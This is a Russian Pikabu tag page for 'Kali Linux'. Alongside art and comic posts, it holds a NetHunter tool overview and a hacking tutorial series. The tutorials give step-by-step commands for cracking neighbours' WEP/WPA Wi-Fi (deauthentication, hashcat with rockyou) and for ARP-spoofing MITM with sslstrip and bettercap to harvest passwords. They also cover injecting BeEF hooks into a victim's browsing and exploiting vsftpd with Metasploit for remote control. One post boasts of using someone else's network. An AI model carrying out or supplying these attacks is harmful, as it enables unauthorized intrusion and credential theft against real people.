Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Я хочу получать рассылки с лучшими постами за неделю
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
Создавая аккаунт, я соглашаюсь с правилами Пикабу и даю согласие на обработку персональных данных.
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam

Пикабу Игры +1000 бесплатных онлайн игр

Собирайте комбинации из блоков! Бесконечный режим, более 100 уровней, ежедневные задания и турниры.

Расслабьтесь и отдохните: игра без ограничений по времени.

Проверьте свою смекалку: головоломка для любителей

Блоки Судоку - расслабляющая головоломка

Головоломки, Гиперказуальные, Мобильная

Играть
Начните с маленькой подводной лодки: устанавливайте бомбы, избавляйтесь от врагов и старайтесь не попадаться на глаза своим плавучим врагам. Вас ждет еще несколько игровых вселенных, много уникальных сюжетов и интересных загадок.

Пикабомбер

Аркады, Пиксельная, 2D

Играть
Классический пинбол, как в древнем игровом автомате или в компактной игрушке: есть пружины, шарики и препятствия. В нашем варианте можно не только зарабатывать очки: чтобы пройти уровень, придется выполнить дополнительную миссию.

Пинбол Пикабу

Аркады, На ловкость, Казуальные

Играть
Игра «История одной фермы» - увлекательное и бросающее вызов вашим серым клеточкам приключение, от которого невозможно оторваться!

История одной фермы - маджонг

Маджонг, Казуальные, Приключения

Играть
Постройте дом своей мечты прямо сейчас! Соединяйте три предмета в один ряд, зарабатывайте звезды и покупайте красивые детали интерьера. Звучит заманчиво? Увлекательная головоломка в жанре «три в ряд» заставит размяться ваш мозг. Присоединяйтесь к онлайн-игре бесплатно прямо сейчас!

Строить дом - три в ряд

Три в ряд, Казуальные, Детские

Играть

Топ прошлой недели

  • CharlotteLink CharlotteLink 1 пост
  • Syslikagronom Syslikagronom 7 постов
  • BydniKydrashki BydniKydrashki 7 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая кнопку «Подписаться на рассылку», я соглашаюсь с Правилами Пикабу и даю согласие на обработку персональных данных.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Новости Пикабу Помощь Кодекс Пикабу Реклама О компании
Команда Пикабу Награды Контакты О проекте Зал славы
Промокоды Скидки Работа Курсы Блоги
Купоны Biggeek Купоны AliExpress Купоны М.Видео Купоны YandexTravel Купоны Lamoda
Мобильное приложение

Kali

С этим тегом используют

Linux Все
26 постов сначала свежее
1
p3pl0s
5 лет назад

Пентестинг со смартфона с помощью Kali NetHunter⁠⁠

Пентестинг со смартфона с помощью Kali NetHunter Kali, Хакеры, Хакерство, Взлом, Wi-Fi, Длиннопост

Запустить и использовать Kali Linux на любом попавшемся смартфоне можно давно. Существуют arm-сборки, которые можно запустить в среде линукс. Есть linux deploy, через который можно монтировать образ. Но также было необходимо найти драйверы, скомпилировать их, собрать и пропатчить ядро и еще много чего допилить. Теперь есть более простой способ использовать Kali Linux на Android устройстве. Этот проект с открытым исходным кодом, разработанный компанией Offensive Security и членом сообщества Kali - BinkyBear, называется Kali Nethunter.


NetHunter - это наложение на Android-ROM, которое включает надежную мобильную платформу для пентестинга, работающую внутри chroot-окружения.

NetHunter включает в себя настраивоемое ядро, chroot Kali Linux и вспомогательные приложения для Android, которые позволяют упростить взаимодействие с различными инструментами безопасности и атаками.

Помимо арсенала инструментов тестирования на проникновение Kali Linux, NetHunter также поддерживает несколько дополнительных возможностей, таких как HID Keyboard Attacks, атаки BadUSB, атаки Evil AP MANA и многое другое.



ВОЗМОЖНОСТИ KALI NETHUNTER

Пентестинг со смартфона с помощью Kali NetHunter Kali, Хакеры, Хакерство, Взлом, Wi-Fi, Длиннопост

NetHunter Home - это графическая оболочка, для быстрого запуска основных инструментов. На экране приветствия можно найти полезную, часто используемую информацию о вашем устройстве, включая внешний и внутреннй IP-адреса, доступность HID-интерфейсов, статус терминала, версию ядра и BusyBox.


Chroot Manager - позволяет проверить целостность установленного chroot-окружения/переустановить/и при необходимости в любой момент добавить нужный инструментарий (metapackages) основного дистрибутива.


NetHunter App Update - дает возможность проверить наличие обновления, не закрывая приложения.


Kali Services - предоставляет возможность удобно запускать и останавливать различные chrooted-сервисы, такие как SSH, Apache, OpenVPN простым нажатием, а также позволяет добавить эти службы в автозагрузку при старте приложения.


Custom Commands - очень удобная возможность добавлять собственные пользовательские команды и функции. Например, если вы много работаете с Wi-Fi, имеет смысл добавить пользовательскую кнопку для Wifite, которая запустит соответствующий скрипт.


MAC Changer - позволяет изменить MAC-адрес и hostname внешего сетевого адаптера.


VNC Manager - менеджер настройки подключения VNC клиента.


NetHunter HID Attacks - "превращает" смартфон в клавиатуру, способную вводить любые заранее заданные команды при подключении к USB порту компютера через OTG кабель.


DuckHunter - атака "Rubber Duck style" позволяет быстро и легко конвертировать скрипты USB Rubber Ducky для использования предидущей утилитой. Можно выбрать опцию из меню «Предварительные настройки» или использовать более широкий выбор предварительно сконфигурированных сценариев на сайте Duck Toolkit.


Mana Wireless - набор утилит для реализации атак "EvilTwin" и "Karma", которые позволяют проводить атаки на Wi-Fi точки доступа c WPA2 аутетификацией (в том числе RADIUS).


MITMf - полноценный Man in the Middle framework, включающий в себя набор разнообразных плагинов для частичного обхода HSTS при помощи SSLStrip+, захват cookies, keylogger на JS, а так же интеграцию с BeeF и BDFactory для инжекта произвольного кода в html браузера и пропатчивания бинарников бекдорами "налету"и пр.


Nmap Scan - этот сканер не нуждается в предствлении, думаю только стоить упомянуть про


удобство реализации, позволяющее легко запускать подробное сканирование по целям/сетям без


необходимости вводить длинную строку в терминале с помощью на экранной клавиатуре.


Metasploit Payload Generator - позволяет легко и быстро создавать Payloads указав всего лишь несколько ключевых параметров (ip, порт и тип нагрузки)


Searchsploit - удобный поиск по Exploit Database по заданным критериям


В состав NetHunter по умолчанию входят приложения сторонних


разработчиков:


App Terminal - позволяет использовать один из нескольких типов терминалов - chrooted терминал


Kali, стандартный терминал Android и root терминал Android


DriveDriod - превращает смартфон в загрузочную флешку Live USB


Shodan - тут нечего добавить))


Router Keygen - генератор паролей для ряда распространенных маршрутизаторов


Сsploit - набор скриптов для проведения тестов на проникновение под rootованный Android


Hacker’s Keyboard — полноразмерная Android-клавиатура


RF Analyzer — пpиложение для работы с RTL-SDR


Источник: vk.com/kali_linux_nethunter

Показать полностью 1
Kali Хакеры Хакерство Взлом Wi-Fi Длиннопост
2
490
nightmaremoon
nightmaremoon
6 лет назад
Арт

Кали⁠⁠

Кали Арт, Рисунок, Богиня, Kali, Ye amber
https://www.artstation.com/artwork/XB3PQY
Показать полностью 1
Арт Рисунок Богиня Kali Ye amber
30
123
eynard
eynard
6 лет назад
Комиксы

Kali⁠⁠

Kali Kali, Nerr, Draws stuff, Длиннопост, Комиксы
Kali Kali, Nerr, Draws stuff, Длиннопост, Комиксы
Kali Kali, Nerr, Draws stuff, Длиннопост, Комиксы
Kali Kali, Nerr, Draws stuff, Длиннопост, Комиксы
Kali Kali, Nerr, Draws stuff, Длиннопост, Комиксы
Kali Kali, Nerr, Draws stuff, Длиннопост, Комиксы

- Итак... ты хочешь, чтобы я укусила тебя, поскольку тебя еще никогда не кусали?
- Дадада!

...
- Ты... в курсе, что мои клыки отравлены, верно? Тебя парализует.

- Ага! Я знаю! Ага!

...

*кусь*

- Я же говорила. Тебе.. в кайф от этого что ли?
- *нечленораздельные звуки удовольствия*

Источник: https://littlejdraws.tumblr.com/

Показать полностью 5
Kali Nerr Draws stuff Длиннопост Комиксы
15
1010010
1010010
7 лет назад

Взлом сети за 10 сек. ⁠⁠

Хочу рассказать на сколько все защищены, любая домашняя сеть взламывается за считанные минуты. Но беда в том что злоумышленник может сделать что угодно из вашей сети и вы ни как на это не сможете повлиять .

Взлом сети за 10 сек.  Kali, Linux, Взлом, Хакеры, Длиннопост

На пример взломать 3 сеть у меня ушло секунд 20 сек. Да воспользовался открытым по... но 20 секунд.... удивительно в сети был закрыт пасс роутера. Но это не проблема я уже сижу на чужом интернете.

Взлом сети за 10 сек.  Kali, Linux, Взлом, Хакеры, Длиннопост

Не стал продолжать. Это не фейк. вот так просто получилось открыть сеть и на ней сидеть.

Взлом сети за 10 сек.  Kali, Linux, Взлом, Хакеры, Длиннопост

Дмитрий это чужая сеть,  моя рт и рс4, это была проверка wifite на моей и чужой сети... Был крайне удивлен результату.

Показать полностью 2
[моё] Kali Linux Взлом Хакеры Длиннопост
23
94
kliMaster
kliMaster
8 лет назад
Информационная безопасность IT

Демонстрация использования эксплоита под MS17-010.⁠⁠

Ms17-010 Эксплойт Бэкдор Kali Видео
15
14
Number571
Number571
8 лет назад
GNU/Linux

<Обучение от малого до великого> //Хакерство (Крэкерство) #6.⁠⁠

Предупреждение! Всё ниже описанное я не призываю исполнять и повторять, а лишь рассказываю и обучаю, чтобы вы могли знать как собран механизм взлома/обмана/и т.п.


В данной статье мы рассмотрим способ взлома устройств через WiFi сеть при помощи эксплоитов. Эксплойт- это программа, при установке которой вы сможете удалённо управлять устройством жертвы. Вы сможете копировать, удалять, изменять файлы, а так же проводить махинации с самой системой, например как её выключение, перезагрузка и т.п. Фактически Exploits- это те же самые RAT-вирусы дающие полный контроль над системой машины. Передаются данные эксплоиты при помощи WiFi через открытые порты в машине жертвы.


Мы рассмотрим один из множества примеров взлома устройств при помощи эксплоитов.


Приступим к данной махинации.

В основном при совершении данной атаки используется связка двух программ: nmap+metasploit.

1.Nmap- выявляет в сети устройства, а так же предоставляет информацию об открытых портах.

2.Metasploit- собственно основа данного метода при помощи которой вы будете заражать эксплоитами машину-цель.

Начнём практику.

root@571:~#msfconsole (в одном окне терминала)

root@571:~#nmap 192.168.1.1(<--IP-роутера)/24 (в другом окне терминала)

root@571:~#nmap 192.168.1.4(<--IP_жертвы) -sV -O -v -A

(При помощи данной команды мы узнаем открытые порты данной машины через которые будут проникать эксплоиты)

(В открывшемся окне metasploit:)

msf>search vsftpd (<-- указываете данную программу, она будет показана в nmap напротив одного из открытых портов под таблицей "VERSIONS")

...Если программа найдёт данный эксплоит, тогда выведится строка в которой будет путь к файлу...

msf>use exploit/unix/ftp/vsftpd (<--путь к файлу)

msf exploit(vsftpd)>show options

...Строка напротив RHOST будет пуста и в неё надо будет вписать IP-жертвы...

msf exploit(vsftpd)>set RHOST 192.168.1.4 (<--IP-жертвы)

msf exploit(vsftpd)>exploit (<-- Запуск программы)

В итоге, если нашлись сессии (sessions) вас автоматически подключит к удалённому доступу.

Можете воспользоваться командой help, чтобы узнать все функции.


Ещё есть иной способ искать нужные эксплоиты по ОС:

root@571:~#searchsploit Windows (<--Указываем Операционную Систему)


Так же можно упомянуть о таких программах как TheFatRat и Websploit. Их нет в оригинальной сборке Kali, так что придётся их докачивать отдельно. Давайте разберём, что представляют собой данные программы.

1) TheFatRat- это программа создания RAT-вируса или же Эксплоитов.

2) Websploit- многофункциональная программа для нахождения уязвимостей в сайтах, заражении устройств в WiFi сети эксплоитами и проведении MITM атак.


1) Установка TheFatRat:

root@571:~#git clone https://github.com/screetsec/TheFatRat.git

root@571:~#cd TheFatRat

root@571:~#cd setup

root@571:~#chmod +x setup.sh && ./setup.sh

root@571:~#cd TheFatRat

root@571:~#chmod +x powerfull.sh

root@571:~#./fatrat (<--Запуск программы)


2) Установка Websploit:

root@571:~#apt install websploit

root@571:~#websploit (<--Запуск программы)

wsf>help

wsf>show modules


Далее вы уже можете сами понять что и как действовать, если обладаете достаточными знаниями английского языка, т.к. программы полностью автоматизированы. Если же вы плохо знаете английский, тогда можете посмотреть в YouTube любую инструкцию связанную с данной программой.


На этой весёлой ноте в принципе можно уже закончить обучение. НО, попрошу вас заметить, что недавно мы создали сообщество связанное с Linux'ом/Хакерством/Крэкерством в ВК. Нам нужны люди, разбирающиеся хорошо в Kali Linux (либо других дистрибутивах для пентестинга), знающие методы и подходы различных способов Крэкерства/Хакерства. Если вы один из таких людей, можете присоединится к нам. В данном сообществе стоит главное правило: "Всегда Делиться Информацией". Это правило относится совершенно ко всем членам нашего общества. Так что как и мы, так и вы найдёте много чего полезного в сфере данной тематики. Чтобы присоединится к нашему коллективу, напишите мне в ВК, я обязательно отвечу.


Связаться со мной можно в ВК: https://vk.com/hydra571.

<Обучение от малого до великого> //Хакерство (Крэкерство) #6. Kali, Linux, Обучение, Хакеры, Крэкерство, Длиннопост
<Обучение от малого до великого> //Хакерство (Крэкерство) #6. Kali, Linux, Обучение, Хакеры, Крэкерство, Длиннопост
<Обучение от малого до великого> //Хакерство (Крэкерство) #6. Kali, Linux, Обучение, Хакеры, Крэкерство, Длиннопост
Показать полностью 3
[моё] Kali Linux Обучение Хакеры Крэкерство Длиннопост
17
34
Number571
Number571
8 лет назад
GNU/Linux

<Обучение от малого до великого> //Хакерство (Крэкерство) #5.⁠⁠

Предупреждение! Всё ниже описанное я не призываю исполнять и повторять, а лишь рассказываю и обучаю, чтобы вы могли знать как собран механизм взлома/обмана/и т.п.


В данной статье будем рассматривать случаи перехвата трафика в Wi-Fi сети.

MITM- человек посередине, посредник. Так называется совокупность методов перехвата трафика, где вы- посредник между роутером и жертвой. Ваш ПК будет служить в роли WiFi-точки тем самым через вас будет проходить весь накопленный трафик.


Я лично не буду рассказывать все методы и комбинации данного вида взлома, т.к. их достаточно много. Мы лично на данном примере разберём два способа. Первый сложный и изживший себя- комбинация ettercap+wireshark. Второй способ относительно новый и удобный. Bettercap- набор инструментов для проведения тестов на безопасность в сети. Так же рассмотрим случай комбинации bettercap+beef. А так же модули для bettercap'a.



I) Начнём с комбинации программ ettercap+wireshark.

root@571:~#ifconfig

root@571:~#echo "1">/proc/sys/net/ipv4/ip_forward

Далее запускаем программу ettercap.

>sniff>unified sniffing>(выбрать сетевую карту (wlan0))

>hosts>scan for hosts

>hosts>host list

>выделить роутер>add to target 1

>выбрать жертву>add to target 2

>MITM>arp poising>галочка напротив пункта "sniff remote connection"

>start>start sniffing

Далее запускаем программу wireshark.

>выбрать сетевую карту (wlan0)>start

root@571:~#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

root@571:~#sslstrip -l 8080

При этом случае в программе ettercap будет выводится вся нужная информация включая пароли жертвы.

Если вы желаете, чтобы вся информация полностью выходила в ваш браузер, можете сделать следующее:

root@571:~#webspy -i wlan0 192.168.1.7(<-вставляете IP-адрес жертвы)

И запускаем браузер.



II) Продолжим изучать методы с программой bettercap.

Bettercap- это более улучшенная версия ettercap, удобная и не хуже оригинала.

Скачать данную программу:

root@571:~#apt-get install bettercap


1)root@571:~#bettercap -X (сниффинг всей сети)

root@571:~#bettercap --proxy -P POST (активируется незащищённая сеть, сниффинг, спуфинг, в общем всё, что нам нужно)

root@571:~#bettercap --sniffer --spoof ARP --proxy-http --proxy-https --custom-parser "password"

...При данном методе будут выводится все данные, где задействованы пароли...


2)root@571:~#./beef (Далее копируем из терминала UI URL со второго абзаца в браузер)

root@571:~#bettercap -I wlan0 -T (Тут IP-жертвы) --proxy-module injectjs (Тут вставляем Hook URL со второго абзаца)

...При этом методе всё будет отображаться на вашем сервере beef открытом в браузере...



III) Так же можно рассмотреть модули для bettercap'a:

Скачать их можно таким образом:

root@571:~#git clone https://github.com/evilsocket/bettercap-proxy-modules.git


Свойства данных модулей:


1)http/androidpwn.rb – Выполнит пользовательскую команду на каждом устройстве Android, эксплуатируя уязвимость "addJavascriptInterface".


2)http/osxsparkle.rb – Выполнит пользовательский исполнимый файл Mach-O OSX на каждой OSX машине, эксплуатируя уязвимость Sparkle Updater https://vulnsec.com/2016/osx-apps-vulnerabilities/.


3)http/beefbox.rb – Похоже на inject*, но специализируется на работе с BeEF framework.


4)http/debug.rb - Отладка HTTP запросов и ответов.


5)http/simple_post.rb – Перехватывает и отображает только выбранные POST поля.


6)http/location_hijacking.rb – Перехватывает заголовок Location с пользовательским URL.


7)http/replace_images.rb – Замена всех изображений на пользовательское.


8)http/rickroll.rb – Вставка iframe с (не)знаменитым видео RickRoll в режиме автовоспроизведения.


9)http/hack_title.rb – Добавляет текст "HACKED" в заголовок веб-сайтов.


10)http/replace_file.rb – Заменяет на лету загружаемые файлы на пользовательские.


TCP прокси модули


11)tcp/debug.rb – Просто скидывает в двоичном формате весь TCP трафик, проходящий через прокси.


12)tcp/sshdowngrade.rb – Если возможно, выполняет атаку понижения SSH 2.x -> 1.x.


13)tcp/mssqlauth.rb - Понижает MSSQL шифрование и захватывает учётные данные входа.


Пример синтаксиса:

root@571:~#bettercap -X --proxy --proxy-module=/home/mial/bin/bettercap-proxy-modules/http/hack_title.rb



IV) И это ещё не все возможные комбинации и функции данной утилиты. Подробно можете почитать в самой программе набрав команду:

root@571:~#bettercap --help



Надеюсь вам понравилось. В дальнейшем буду продолжать опубликовывать статьи по дистрибутиву Kali Linux.



Связаться со мной можно в ВК: https://vk.com/hydra571.

<Обучение от малого до великого> //Хакерство (Крэкерство) #5. Kali, Linux, Wi-Fi, Хакеры, Крэкерство, Обучение, Длиннопост
<Обучение от малого до великого> //Хакерство (Крэкерство) #5. Kali, Linux, Wi-Fi, Хакеры, Крэкерство, Обучение, Длиннопост
<Обучение от малого до великого> //Хакерство (Крэкерство) #5. Kali, Linux, Wi-Fi, Хакеры, Крэкерство, Обучение, Длиннопост
<Обучение от малого до великого> //Хакерство (Крэкерство) #5. Kali, Linux, Wi-Fi, Хакеры, Крэкерство, Обучение, Длиннопост
Показать полностью 4
[моё] Kali Linux Wi-Fi Хакеры Крэкерство Обучение Длиннопост
5
35
Number571
Number571
8 лет назад
GNU/Linux

<Обучение от малого до великого> //Хакерство (Крэкерство) #4.⁠⁠

Предупреждение! Всё ниже описанное я не призываю исполнять и повторять, а лишь рассказываю и обучаю, чтобы вы могли знать как собран механизм взлома/обмана/и т.п.


В данном уроке мы рассмотрим различные способы взлома защищённых WiFi точек при помощи дистрибутива Kali Linux.


Ниже описанные махинации не работают с Kali Linux'ом установленном на VirtualBox. Так что стоит либо сделать обычный установщик USB с Kali и от туда из режима live проворачивать данные действия (главное не забудьте скинуть все полученные файлы на основную машину, иначе они не сохранятся), либо установить на раздел жёсткого диска/целиком на жёсткий диск. Вы можете посмотреть подробную установку Kali в моих прошлых уроках.


Для справки:

()- в скобках будут уточнения.

""- в кавычках будут уточнения насчёт ввода чего-либо

... ...- отступления от темы для нужного уточнения


I) Технология защиты беспроводной сети WEP.

Совершенно не будет проблем получить доступ к данной сети. Можно сказать, что люди с WEP защитой просто дарят пароль. Соответственно такой защиты мало в настоящее время, но найти до сих пор можно. Начнём взлом.


root@571:~#iwconfig

root@571:~#airmon-ng start wlan0 (<- вводим сетевую карту в режим мониторинга)

root@571:~#iwconfig (проверяете, появилось ли новое значение)

root@571:~#airodump-ng wlan0mon (Появится таблица с нужными нам свойствами)

root@571:~#airodump-ng --bssid "Вставляем значение из столбца BSSID нужной нам (WEP) WiFi точки" --channel "Вставляем значение из столбца CH" -w /tmp/wep/ wlan0mon

... На данном моменте нужно ждать примерно 200.000 frames

Останавливаем процесс, когда frames накапали ...

root@571:~#cd /tmp/

root@571:~#ls -l (Просматриваете, есть ли файл wep-01.cap)

root@571:~#aircrack-ng wep-01.cap

... При нахождении нужного ключа появится надпись KEY FOUND!

Переписываете в блокнот последовательно все символы за исключение ":".

Должно получится что-то наподобие- 5R2IF4HG824F11YJ361743I2N8 (26 символов)

Далее подключаемся к роутеру без автоматики. У вас попросят ключ. Вставляете его и всё готово.


II) Технология защиты беспроводной сети WPA/WPA2

Данная защита ушла в лучшую сторону от старечка WEP, но всё равно остаётся уязвимой.

root@571:~#iwconfig

root@571:~#airmon-ng start wlan0 (<- вводим сетевую карту в режим мониторинга)

root@571:~#iwconfig (проверяете, появилось ли новое значение)

root@571:~#airodump-ng wlan0mon (Появится таблица с нужными нам свойствами)

root@571:~#airodump-ng --bssid "Вставляем значение из столбца BSSID нужной нам (WPA/WPA2) WiFi точки" --channel "Вставляем значение из столбца CH" -w /tmp/wep/ wlan0mon

... На данном моменте нужно ждать примерно 200.000 frames

Останавливаем процесс, когда frames накапали

И_Л_И

Если вы не хотите ждать, можете воспользоваться лёгкой альтернативой- деавторизировать пользователя в данной сети ...

root@571:~#aireplay-ng -0 1 -a "Вставляем значение из столбца BSSID нужной нам (WPA/WPA2) WiFi точки" -c "Вставляем значение из столбца STATION одного из пользователей данной сети для деавторизации" wlan0mon

root@571:~#cd /tmp/

root@571:~#ls -l (Просматриваете, есть ли файл wpa-01.cap)

root@571:~#aircrack-ng wpa-01.cap -J wpa-01.hccap

... Получаем файл wpa-01.hccap

Далее нужен уже соответственно подбирать по словарю получившиеся данные, либо брутфорсить.


1.1. Пример подбора по словарю:

hashcat -m 2500 /root/hs/wpa-01.hccap /root/rockyou.txt (rockyou.txt- это словарь часто всего встречаемых паролей, (http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2) весит он ~140Mb, в архиве ~60Mb)).

И просто соответственно ждёте пока не Kali не найдёт нужный вам пароль.


1.2. Второй вариант подбора по словарю (Windows):

Перекидываете файл на жёсткий диск Windows.

Скачиваете программу Hashcat. (https://hashcat.net/hashcat/)

Перекидываете файл .hccap и rockyou.txt в папку с .exe файлом hashcat.

Запускаете CMD от имени Администратора.

>cd Hashcat

>Hashcat64.exe -m 2500 wpa-01.hccap rockyou.txt

В итоге при успешном подборе получаем вкратце следующее:

DAP- "ненужные числа":"ненужные символы":"нужный пароль"


2. Пример работы брутфорса:

hashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d (Но в этом есть минус, данный брутфорс лишь выводит числа без иных символов).


Надеюсь вам понравилось. В дальнейшем буду продолжать опубликовывать статьи по дистрибутиву Kali Linux.


Связаться со мной можно в ВК: https://vk.com/hydra571.

<Обучение от малого до великого> //Хакерство (Крэкерство) #4. Kali, Linux, Хакеры, Крэкерство, Обучение, Wi-Fi, Длиннопост
Показать полностью 1
[моё] Kali Linux Хакеры Крэкерство Обучение Wi-Fi Длиннопост
16
Посты не найдены
О Нас
О Пикабу
Контакты
Реклама
Сообщить об ошибке
Сообщить о нарушении законодательства
Отзывы и предложения
Новости Пикабу
RSS
Информация
Помощь
Кодекс Пикабу
Награды
Команда Пикабу
Бан-лист
Конфиденциальность
Правила соцсети
О рекомендациях
Наши проекты
Блоги
Работа
Промокоды
Игры
Скидки
Курсы
Зал славы
Mobile
Мобильное приложение
Партнёры
Промокоды Biggeek
Промокоды Маркет Деливери
Промокоды Яндекс Путешествия
Промокоды М.Видео
Промокоды в Ленте Онлайн
Промокоды Тефаль
Промокоды Сбермаркет
Промокоды Спортмастер
Постила
Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии